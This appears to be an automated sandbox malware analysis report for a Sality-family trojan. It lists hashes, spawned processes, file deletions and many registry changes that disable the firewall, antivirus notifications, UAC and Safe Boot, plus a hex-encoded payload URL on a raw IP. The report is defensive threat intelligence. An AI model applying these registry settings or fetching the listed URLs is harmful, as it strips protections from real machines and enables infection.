not-a-virus:AdWare.NSIS.Adwapper.ai (Kaspersky), Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Trojan.Win32.Alureon.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Virus, Adware, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b3ed4f793938d67d57f622a85e8e6436
SHA1: 6e0edf2b4af7ac6ee67e5c2922ebe37fd73271bd
SHA256: 45afbd849ce9dec3da5c2f01bac6229a77499a73dc3d88163145a66d496555bc
SSDeep: 196608:Y4UwDTJD5NsF1E7C0NV952G4TPqql5sSBkpAIIwQbruiUM6E7n6h:Y7wDTB5uFEBNVP2G4TbPsSBIK3GMc
Size: 9946112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Trojan creates the following process(es):
GoogleUpdate.exe:2616
GoogleUpdate.exe:2788
GoogleUpdate.exe:2396
GoogleUpdate.exe:3060
GoogleUpdate.exe:2140
GoogleUpdate.exe:3724
GoogleUpdate.exe:2504
a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092
%original file name%.exe:312
a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964
Sense-codedownloader.exe:3400
Sense-codedownloader.exe:3032
a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568
Tkbjndnqomlxl.exe:2840
regsvr32.exe:2328
The Trojan injects its code into the following process(es):
Explorer.EXE:1140
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process GoogleUpdate.exe:2788 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\globalUpdate\Update\Install (0 bytes)
The process GoogleUpdate.exe:3724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
The process %original file name%.exe:312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\wduc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winkumnvb.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp (0 bytes)
%System%\drivers\ktonn.sys (0 bytes)
%WinDir%\7f172 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0007F3B4_Rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\orxds.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
The process Tkbjndnqomlxl.exe:2840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
%WinDir%\Tasks\temp_a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\7809 (0 bytes)
Registry activity
The process GoogleUpdate.exe:2616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E A2 E2 33 46 8A 98 29 30 6A 96 B6 21 4D 99 DE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"
The process GoogleUpdate.exe:2788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
The process GoogleUpdate.exe:2396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F B0 6B 89 26 41 E7 4E A4 C0 AE BC B5 B5 6E 4C"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:3060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 F4 08 EF ED 98 77 7F B8 B9 4A BC 21 15 66 F3"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:2140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
The Trojan deletes the following registry key(s):
[HKCR\AppID\GoogleUpdate.exe]
The process GoogleUpdate.exe:3724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
The Trojan deletes the following value(s) in system registry:
The process GoogleUpdate.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 60 99 36 45 94 FD B0 74 2D DA A9 B8 0B 3F DD"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The process %original file name%.exe:312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Stvncyfrlda]
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
"m1_184" = "3766606054"
"m1_185" = "2104512924"
"m1_188" = "1853360062"
"m1_189" = "106042406"
"m2_459" = "1929502427"
"m2_458" = "194199775"
"m2_457" = "2753885435"
"m2_456" = "1018590414"
"m2_455" = "3578271205"
"m2_454" = "1842973114"
"m2_453" = "107690774"
"m2_452" = "2667355176"
"m2_451" = "932073901"
"m2_450" = "3491741982"
"m3_517" = "3808718088"
"m3_516" = "2073820573"
"m1_344" = "4031224913"
"m1_345" = "4261669520"
"m1_346" = "1845180925"
"m1_347" = "1495798530"
"m1_340" = "4107917070"
"m1_341" = "3994901791"
"m1_342" = "3100927528"
"m1_343" = "1374383541"
"m1_348" = "1383808088"
"m1_349" = "3211190306"
"m1_296" = "32700597"
"m1_297" = "2748245620"
"m1_294" = "2278797121"
"m1_295" = "515747364"
"m1_292" = "3985841999"
"m1_293" = "2634536054"
"m1_290" = "810759105"
"m1_291" = "3243511153"
"m3_232" = "3172438241"
"m3_233" = "578813980"
"m3_230" = "3963318727"
"m3_231" = "1436934514"
"m3_236" = "1489883733"
"m3_237" = "3225308608"
"m1_298" = "3130476118"
"m1_299" = "1659204371"
"m3_308" = "1910334733"
"m3_309" = "3645838520"
"m3_306" = "2734840419"
"m3_307" = "141358494"
"m3_304" = "3525786457"
"m3_305" = "999402228"
"m3_302" = "88348863"
"m3_303" = "1790347306"
"m3_300" = "879360405"
"m3_301" = "2648336640"
"m4_12" = "3643619612"
"m4_13" = "1083943049"
"m4_10" = "173038146"
"m4_11" = "1908328879"
"m4_16" = "1994847952"
"m4_17" = "3730138685"
"m4_14" = "2819233782"
"m4_15" = "259557219"
"m4_18" = "1170462122"
"m4_19" = "2905752855"
"m4_447" = "2580844371"
"m3_544" = "3417288073"
"m3_545" = "857234724"
"m3_546" = "2559233107"
"m3_547" = "33259470"
"m3_540" = "770728901"
"m3_541" = "2506232688"
"m3_542" = "4207706863"
"m3_543" = "1648177690"
"m3_548" = "1768288125"
"m3_549" = "3470237416"
"m4_198" = "4285148750"
"m4_199" = "1725472187"
"m4_448" = "21167808"
"m4_449" = "1756458541"
"m4_194" = "1638953114"
"m4_195" = "3374243847"
"m4_196" = "814567284"
"m4_197" = "2549858017"
"m4_190" = "3287724774"
"m4_191" = "728048211"
"m4_192" = "2463338944"
"m4_193" = "4198629677"
"m3_496" = "1693747481"
"m3_497" = "3429185716"
"m3_494" = "2518183551"
"m3_495" = "4287240682"
"m3_492" = "3376238421"
"m3_493" = "783285952"
"m3_490" = "4167183499"
"m3_491" = "1640815654"
"m3_498" = "903325731"
"m3_499" = "2638240606"
"m4_222" = "2982453382"
"m4_223" = "422776819"
"m1_79" = "1913234704"
"m1_78" = "4118415213"
"m4_226" = "1333681722"
"m4_227" = "3068972455"
"m4_224" = "2158067552"
"m4_225" = "3893358285"
"m1_73" = "1982944427"
"m1_72" = "4180144338"
"m1_71" = "2005941269"
"m1_70" = "503825556"
"m1_77" = "3267195005"
"m1_76" = "3320388867"
"m1_75" = "1263983444"
"m1_74" = "3775077689"
"m3_166" = "278866567"
"m3_167" = "2013911602"
"m3_164" = "1136397309"
"m3_165" = "2871966568"
"m3_162" = "1927407827"
"m3_163" = "3662911566"
"m3_160" = "2751909385"
"m3_161" = "225933732"
"m3_168" = "3782899105"
"m3_169" = "1189405916"
"m3_641" = "4203189700"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKCU\Software\Stvncyfrlda]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Stvncyfrlda\168128873]
"-824385830" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 6B 24 65 D1 CD CB 03 3B 65 E4 A1 CC 33 5D E7"
[HKCU\Software\Stvncyfrlda\168128873]
"910904903" = "0"
[HKCU\Software\Stvncyfrlda\168128873]
"-1648771660" = "30"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Stvncyfrlda\168128873]
"-737866757" = "4B278A835FE92988F90F7C3CA41943E954C2A3E5F485BE927C19BB1BE3A4606DACD30115F9A5DFCC9A54A9CBC970B3F5552946D7DCA330D47DB444FE33A74E4F3934F853C78E0DC6D9EEE227165CFE1E5F4DF951B4E949E9FD58BC2F492F3A5FE47491DA52289271F36B555070B2FE3D61BD99AA79CD32B302250EFC3B19E5BA5983117001ACB3CC3315F4E8A6E14E431831F637A045E8B2E9D85E4FE4BB17441E184C36D2CE87AFD142CC126B0B44025A35802EFB7597B96B29F209B5C200ABEF3AD8D9E89ED2BD716737EA3531C319A48A0859A5D987B1F40AD720852CD4BAEEFF0335C753F5B39E9B397C689313439635D8144E674989A2B7C1E13F1E2F2E"
[HKCU\Software\Stvncyfrlda\168128873]
"1821809806" = "0200687474703A2F2F736C776F6366642F736F62616B61312E67696600687474703A2F2F34362E3130352E3130332E3231392F736F62616B61766F6C6F732E676966"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Stvncyfrlda\168128873]
"86519073" = "67"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
A rule is added to the Windows Firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\termservice]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\TDI]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Browser]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SCSI Class]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBT]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sr.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WinMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\File system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmserver]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\EventLog]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Messenger]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Ndisuio]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SharedAccess]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\RpcSs]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SCSI Class]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Tcpip]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot file system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PNP Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\CryptSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Primary disk]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Netlogon]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vga.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\HelpSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WZCSVC]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmserver]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetMan]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Base]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\File system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmadmin]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AppMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanServer]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AFD]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Base]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DnsCache]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PlugPlay]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Dhcp]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmload.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SRService]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\nm.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmio.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\nm]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\EventLog]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Network]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LmHosts]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SRService]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOS]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys]
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Control\SafeBoot]
"AlternateShell"
The process a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 09 DF D0 83 3F 87 AD 9E B9 C8 23 ED B1 07 36"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The process Sense-codedownloader.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 90 BC B8 1C 57 97 FD 1D 26 C9 AA FB 64 6B DA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes that have no dots in their names and do not belong to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
